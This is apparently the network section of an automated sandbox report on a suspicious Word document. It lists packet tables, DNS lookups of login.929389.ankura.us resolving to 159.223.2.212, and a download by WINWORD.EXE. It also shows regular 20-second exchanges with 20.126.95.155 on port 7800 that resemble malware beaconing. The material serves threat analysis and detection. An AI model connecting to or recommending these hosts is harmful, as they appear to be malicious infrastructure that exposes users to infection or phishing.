Sep 23, 2022 08:13:09.038600922 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038606882 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038629055 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038656950 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038661003 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038685083 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038728952 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038738012 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038763046 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038799047 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038820982 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038835049 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038851023 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038871050 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038904905 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038937092 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.038942099 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.038978100 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039012909 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039014101 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039048910 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039078951 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039083004 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039110899 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039124012 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039144993 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039169073 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039186954 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039201021 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039227009 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039244890 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039258003 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039284945 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039298058 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039316893 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039341927 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039366007 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039400101 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039424896 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039449930 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039453983 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039483070 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039491892 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039515972 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039541006 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039558887 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039572001 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039599895 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039613008 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039633036 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039659023 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039683104 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039709091 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039710045 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039748907 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039866924 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039891005 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039915085 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.039917946 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039967060 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.039983034 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040019989 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040043116 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040065050 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040072918 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.040100098 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040129900 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.040178061 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040205002 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040226936 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.040241957 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040270090 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040287018 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.040306091 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040333033 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040350914 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.040371895 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040396929 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040421963 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.040431023 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040466070 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040497065 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040530920 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.040532112 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040563107 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.040568113 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040604115 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040632010 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.040641069 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040676117 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.040699959 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.060297012 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060357094 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060403109 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060446024 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060492039 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060504913 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.060544968 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.060549974 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060580015 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060622931 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060626984 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.060669899 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060713053 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060722113 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.060756922 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060800076 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060813904 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.060848951 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060893059 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060903072 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.060935020 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.060976028 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.060981035 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061031103 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061060905 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061074972 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.061100006 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061114073 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.061144114 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061187029 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061187983 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.061227083 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061269999 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061280012 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.061312914 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061353922 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061363935 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.061399937 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061443090 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061448097 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.061486006 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061536074 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061537027 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.061579943 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061625957 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.061625957 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061669111 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061709881 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061716080 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.061752081 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061794996 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061798096 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.061836958 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061881065 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061882973 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.061922073 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061965942 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.061973095 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.061985016 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.062024117 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062064886 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062105894 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062125921 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.062150002 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062194109 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062196016 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.062237024 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062279940 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062282085 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.062323093 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062364101 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062369108 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.062408924 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062453032 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062454939 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.062494040 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062536001 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062537909 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.062578917 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.062627077 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.064970016 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065030098 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065057993 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065093994 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.065107107 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065149069 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.065155029 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065200090 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065243006 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065248013 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.065288067 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065330982 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065335989 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.065399885 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065454960 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065460920 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.065485001 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065534115 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065546036 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.065577984 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065624952 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065625906 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.065673113 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065718889 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.065718889 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065763950 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065808058 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065819979 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.065855026 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065898895 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065903902 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.065943956 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065989971 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.065994024 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.066031933 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066080093 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066087961 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.066126108 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066167116 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066174984 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.066209078 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066251040 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066256046 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.066293955 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066337109 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066346884 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.066378117 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066420078 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066423893 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.066466093 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066507101 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066509008 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.066551924 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066596031 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066601038 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.066638947 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066682100 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066684961 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.066721916 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066764116 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066768885 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.066808939 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066849947 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066862106 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.066891909 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066936016 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.066947937 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.066981077 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067025900 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067029953 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.067070961 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067117929 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067162991 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067197084 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.067203045 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067245007 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067246914 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.067286015 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067298889 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.067327976 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067392111 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.067419052 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067466974 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067507982 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067550898 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.067553043 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067598104 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067612886 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.067639112 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067681074 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067694902 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.067723036 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067765951 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067780972 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.067811966 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067852974 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067873001 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.067894936 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067936897 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.067955017 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.067977905 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.068020105 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.068032980 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.068063021 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.068109989 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.068125963 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.068156958 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.068198919 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.068212986 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.068249941 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.068291903 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.068314075 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.068325996 CEST	80	49172	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:09.068386078 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:09.398585081 CEST	49172	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:32.123289108 CEST	49173	7800	192.168.2.22	20.126.95.155
Sep 23, 2022 08:13:32.150927067 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:13:32.151196957 CEST	49173	7800	192.168.2.22	20.126.95.155
Sep 23, 2022 08:13:32.180190086 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:13:32.391184092 CEST	49173	7800	192.168.2.22	20.126.95.155
Sep 23, 2022 08:13:32.470319986 CEST	49173	7800	192.168.2.22	20.126.95.155
Sep 23, 2022 08:13:32.549304962 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:13:52.179666996 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:13:52.187047005 CEST	49173	7800	192.168.2.22	20.126.95.155
Sep 23, 2022 08:13:52.273865938 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:14:12.188020945 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:14:12.194560051 CEST	49173	7800	192.168.2.22	20.126.95.155
Sep 23, 2022 08:14:12.284440994 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:14:32.202461958 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:14:32.221617937 CEST	49173	7800	192.168.2.22	20.126.95.155
Sep 23, 2022 08:14:32.293796062 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:14:51.121380091 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:14:52.204543114 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:14:52.213450909 CEST	49173	7800	192.168.2.22	20.126.95.155
Sep 23, 2022 08:14:52.298713923 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:15:12.213968992 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:15:12.230201960 CEST	49173	7800	192.168.2.22	20.126.95.155
Sep 23, 2022 08:15:12.303150892 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:15:32.226881027 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:15:32.237814903 CEST	49173	7800	192.168.2.22	20.126.95.155
Sep 23, 2022 08:15:32.320777893 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:15:52.235686064 CEST	7800	49173	20.126.95.155	192.168.2.22
Sep 23, 2022 08:15:52.236115932 CEST	49173	7800	192.168.2.22	20.126.95.155
Sep 23, 2022 08:15:52.327574968 CEST	7800	49173	20.126.95.155	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 23, 2022 08:13:01.747231007 CEST	55868	53	192.168.2.22	8.8.8.8
Sep 23, 2022 08:13:01.771946907 CEST	53	55868	8.8.8.8	192.168.2.22
Sep 23, 2022 08:13:05.736835957 CEST	49688	53	192.168.2.22	8.8.8.8
Sep 23, 2022 08:13:05.760781050 CEST	53	49688	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 23, 2022 08:13:01.747231007 CEST	192.168.2.22	8.8.8.8	0xe3a3	Standard query (0)	login.929389.ankura.us	A (IP address)	IN (0x0001)	false
Sep 23, 2022 08:13:05.736835957 CEST	192.168.2.22	8.8.8.8	0x447a	Standard query (0)	login.929389.ankura.us	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 23, 2022 08:13:01.771946907 CEST	8.8.8.8	192.168.2.22	0xe3a3	No error (0)	login.929389.ankura.us		159.223.2.212	A (IP address)	IN (0x0001)	false
Sep 23, 2022 08:13:05.760781050 CEST	8.8.8.8	192.168.2.22	0x447a	No error (0)	login.929389.ankura.us		159.223.2.212	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49171	159.223.2.212	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

